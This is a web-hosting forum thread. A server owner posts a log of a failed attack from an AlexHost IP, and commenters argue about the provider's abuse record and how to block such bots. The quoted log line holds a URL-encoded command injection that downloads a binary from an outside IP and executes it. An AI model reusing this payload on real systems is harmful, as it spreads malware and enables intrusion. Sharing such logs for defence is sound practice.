New on LowEndTalk? Please Register and read our Community Rules.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
Attack is coming to my server from AlexHost
Log from my server:
91.208.184.113 - - [19/Jun/2025:15:35:57 +0200] "POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20arm7%3B%20wget%20http%3A%2F%2F193.32.162.74%2Fbins%2Farm7%3B%20chmod%20777%20arm7%3B%20.%2Farm7%20routers HTTP/1.1" 404 257
Conclusion:
This is an attack aimed at loading and executing a malicious binary on the server. Since the server responded with a 404, the attack failed via this path.
Attacker's IP address:
https://www.ip-tracker.org/lookup.php?ip=91.208.184.113
Thanked by 1mrTom
Comments
Slightly unrelated:
My prediction: AlexHost is gonna deadpool in a year or around for one reason or another. I know it will.
As for topic, the bots using alexhost are attempting RCE.
AlexHost has a habit of hosting habitual spammers and abusers. Here is a quick look:
https://www.abuseipdb.com/check-block/91.208.184.113/24
What reasons are those?
I've looked thru some of the IPs. Not only do they have a lot of customers, but most of the sites hosted there seem legit and innocuous.
It's a shot in the dark. Can't say the reason yet but I believe it will happen. For similar reason why Aeza and that other pq or some other hosting died.
Plus those IP are also listed in some mail abuser. https://mxtoolbox.com/blacklists.aspx
I would like to hear about this @alexhost
one,
ips are recycled
two,
boxes get pwned
it most certainly has nothing to do with AH.
just reach out, you'll get a new ip.
The IP address currently belongs to AlexHost... everything else you listed is irrelevant.
That is strong prediction, any others you think would be deadpool too.
alexhost lease ips from other brokers.
they generally do not own their ips.
when they lease new ips, they are often times used by spammers, etc.
takes time for them to get cleaned up.
point is, it's not as simple as one would want to think.
You want to say that AH did not rent a server to someone who is trying to attack other servers.
Here you have more details:
https://myip.ms/info/whois/91.208.184.113
Those are just bots ig, nothing to worry about. You can block them on the firewall level or if useing nginx just 444 them ig
i'm sure they will take action against the user if you reported it to them. you did report it to them, right?
That is NOT to say that:
1. SOME IPs are IN FACT abused by AH clients.
Regardless, in this case, it's absolute nonsense to blame AH for this.
It's just how the world works.
One time an IP is leased by one company, another... well, a completely different one. Some abuse them to hell, some not. It's up to the new company to clean it up.
I'm reporting it here too. @alexhost
I know all that, of course it's a bot, but you have to know that someone installed the bot and started the bot.
Regarding the firewall, it is set to automatically block such things, blacklisting the IP.
I don't know, but before buying an IP address, I would also check what I'm buying, how much of it is contaminated. That's pure logic, isn't it?
Absolutely, brother...
In that case:
So you are in somewhat of a pickle... One thing you can do is to simply go to bgp.tools, look up all of their ranges through Spamhaus (SBL), and see if they are SBL'd or not.
If not, you're gucci.
If not, well, move on, I suppose... Some people that keep a clean network are @Clouvider, if I remember correctly. Otherwise, you pretty much have to use mainstream costs, or someone like SpectraIP.. if he can hook you up with /29 from a clean /24? If I remember correctly, you are good with Spectra.
the internet is scary, randos always touching you
Here you have the answer:
https://bgp.tools/prefix/91.208.184.0/24
Registered on
7 Nov 2019 (5 years old)
Registered to
md.alexhost (ripe)
Enough with the smart ones!
So... what's the problem? Ask for a different IP? Different /24? Some people...
No problem, read the beginning of this post.
This is just information, and I want to hear AH's comment.
Best regards!
If this something always happen if we use cheap plan, than what is the need to use LET providers.
block the IP and that's it
do you think they dont have smarter work than commenting a compromised server?
I get 1000of them daily from OVH, Hetzner, Leaseweb all over the place
Someone rented an AlexHost VPS and is scanning the whole world for vulnerable routers, OVH, Hetzner, Azure and everyone on this planet gets abused by those people, it's not an AlexHost thingy at all.
Best you can do is report the AlexHost IP but you will still have a 1000 other IPs from all over the world scan and try out automated scripts that try to hack your server.
Ah, need some sleep
Yeah, good luck with that... Day I am going to block any AS or ranges is the day I am going to quit the Internets, haha.
Yeah exactly, its a pointless thing, just run fail2ban/crowdsec and auto block those IPs or leave the Internet or don't give a fuck.
Just block 0.0.0.0/0 and ::/0 in your firewall, it's even simpler, doesn't require installing anything extra (assuming you have a firewall installed). I was able to block a large number of malicious traffic with this one simple trick.
That's life.
I meet such visits from all over the world everyday, most of which come from China, US, Brazil.
sue them
https://www.abuseipdb.com/check-block/91.208.184.113/24
Thats a pretty impressive percentage of customers that happen to be abusers, without any knowlegde of the host of course..... Imagine what would happen businesswise if they reacted on abuse reports...
hmm, normal
that is the internet, secure your web apps and ports